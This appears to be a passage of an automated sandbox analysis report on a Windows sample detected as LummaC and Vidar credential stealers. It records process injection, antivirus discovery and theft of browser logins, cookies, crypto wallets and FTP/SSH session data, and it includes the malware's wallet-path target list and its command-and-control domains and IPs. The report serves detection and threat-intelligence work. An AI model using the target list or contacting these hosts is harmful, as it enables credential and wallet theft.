                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0042B623
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,3_2_0042E6A4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeQueries volume information: C:\ProgramData\ECBKKKFHCF.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,3_2_0041C0E9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_00410C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_00410D2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: RegAsm.exe, 00000003.00000002.2803671443.000000000123A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5888, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: seed.seco
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5888, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F0C40 sqlite3_bind_zeroblob,3_2_6C7F0C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F0D60 sqlite3_bind_parameter_name,3_2_6C7F0D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C718EA0 sqlite3_clear_bindings,3_2_6C718EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,3_2_6C7F0B40

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		Boot or Logon Initialization Scripts511
                          Process Injection                          		11
                          Deobfuscate/Decode Files or Information                          		1
                          Credentials in Registry                          		1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          PowerShell                          		Logon Script (Windows)Logon Script (Windows)4
                          Obfuscated Files or Information                          		Security Account Manager4
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                          Software Packing                          		NTDS55
                          System Information Discovery                          		Distributed Component Object Model2
                          Clipboard Data                          		124
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets251
                          Security Software Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Masquerading                          		Cached Domain Credentials31
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                          Virtualization/Sandbox Evasion                          		DCSync12
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                          Process Injection                          		Proc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524788 Sample: file.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 46 treatynreit.site 2->46 48 steamcommunity.com 2->48 50 9 other IPs or domains 2->50 64 Multi AV Scanner detection for domain / URL 2->64 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 13 other signatures 2->70 9 file.exe 2 2->9         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\...\file.exe.log, CSV 9->36 dropped 80 Contains functionality to inject code into remote processes 9->80 82 Writes to foreign memory regions 9->82 84 Allocates memory in foreign processes 9->84 86 Injects a PE file into a foreign processes 9->86 13 RegAsm.exe 1 145 9->13         started        18 conhost.exe 9->18         started        signatures6 process7 dnsIp8 58 cowod.hopto.org 45.132.206.251, 49751, 80 LIFELINK-ASRU Russian Federation 13->58 60 49.12.197.9, 443, 49721, 49722 HETZNER-ASDE Germany 13->60 62 2 other IPs or domains 13->62 38 C:\Users\user\...\66fe13d251bbf_lsod[1].exe, PE32 13->38 dropped 40 C:\ProgramData\softokn3.dll, PE32 13->40 dropped 42 C:\ProgramData\nss3.dll, PE32 13->42 dropped 44 5 other files (3 malicious) 13->44 dropped 88 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->88 90 Found many strings related to Crypto-Wallets (likely being stolen) 13->90 92 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->92 94 5 other signatures 13->94 20 ECBKKKFHCF.exe 2 13->20         started        23 cmd.exe 1 13->23         started        file9 signatures10 process11 signatures12 72 Multi AV Scanner detection for dropped file 20->72 74 Writes to foreign memory regions 20->74 76 Allocates memory in foreign processes 20->76 78 2 other signatures 20->78 25 RegAsm.exe 20->25         started        28 conhost.exe 20->28         started        30 RegAsm.exe 20->30         started        32 conhost.exe 23->32         started        34 timeout.exe 1 23->34         started        process13 dnsIp14 52 gravvitywio.store 104.21.16.12, 443, 49757 CLOUDFLARENETUS United States 25->52 54 absorptioniw.site 104.21.17.174, 443, 49755 CLOUDFLARENETUS United States 25->54 56 6 other IPs or domains 25->56

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe28%VirustotalBrowse

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\ECBKKKFHCF.exe34%ReversingLabsWin32.Trojan.Generic
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fe13d251bbf_lsod[1].exe34%ReversingLabsWin32.Trojan.Generic

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          treatynreit.site1%VirustotalBrowse
                          snarlypagowo.site1%VirustotalBrowse
                          steamcommunity.com0%VirustotalBrowse
                          questionsmw.store10%VirustotalBrowse
                          mysterisop.site1%VirustotalBrowse
                          absorptioniw.site1%VirustotalBrowse
                          chorusarorp.site1%VirustotalBrowse
                          gravvitywio.store8%VirustotalBrowse
                          soldiefieop.site1%VirustotalBrowse
                          abnomalrkmu.site1%VirustotalBrowse
                          cowod.hopto.org7%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                          http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a0%URL Reputationsafe
                          https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                          https://mozilla.org0/0%URL Reputationsafe
                          http://www.entrust.net/rpa030%URL Reputationsafe
                          http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://store.steampowered.com/points/shop/0%URL Reputationsafe
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                          https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
                          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                          https://www.entrust.net/rpa00%URL Reputationsafe
                          https://store.steampowered.com/about/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                          http://ocsp.entrust.net030%URL Reputationsafe
                          http://ocsp.entrust.net020%URL Reputationsafe
                          https://help.steampowered.com/en/0%URL Reputationsafe
                          https://store.steampowered.com/news/0%URL Reputationsafe
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                          http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
                          https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                          https://49.12.197.9/10%VirustotalBrowse
                          https://soldiefieop.site/api14%VirustotalBrowse
                          https://gravvitywio.store/0%VirustotalBrowse
                          https://steamcommunity.com/profiles/76561199780418869/badges0%VirustotalBrowse
                          https://abnomalrkmu.site/api12%VirustotalBrowse
                          http://cowod.hopto.org7%VirustotalBrowse
                          abnomalrkmu.site1%VirustotalBrowse
                          https://mysterisop.site/api14%VirustotalBrowse
                          https://49.12.197.9/freebl3.dll0%VirustotalBrowse
                          https://49.12.197.9/sqlp.dll11%VirustotalBrowse
                          http://cowod.hopto.org_DEBUG.zip/c0%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e0%VirustotalBrowse
                          https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.00%VirustotalBrowse
                          https://gravvitywio.store/apij6%VirustotalBrowse
                          absorptioniw.site1%VirustotalBrowse
                          https://49.12.197.910%VirustotalBrowse
                          https://49.12.197.9/softokn3.dll0%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol0%VirustotalBrowse
                          treatynreit.site1%VirustotalBrowse
                          https://t.me/ae5ed2%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP0%VirustotalBrowse
                          http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                          https://49.12.197.9/vcruntime140.dll0%VirustotalBrowse
                          https://mysterisop.site/pi7%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a0%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          treatynreit.site
                          		104.21.84.18
                          		truetrueunknown
                          snarlypagowo.site
                          		104.21.18.193
                          		truetrueunknown
                          steamcommunity.com
                          		104.102.49.254
                          		truetrueunknown
                          questionsmw.store
                          		172.67.208.141
                          		truetrueunknown
                          mysterisop.site
                          		104.21.21.3
                          		truetrueunknown
                          absorptioniw.site
                          		104.21.17.174
                          		truetrueunknown
                          abnomalrkmu.site
                          		172.67.152.190
                          		truetrueunknown
                          cowod.hopto.org
                          		45.132.206.251
                          		truetrueunknown
                          gravvitywio.store
                          		104.21.16.12
                          		truetrueunknown
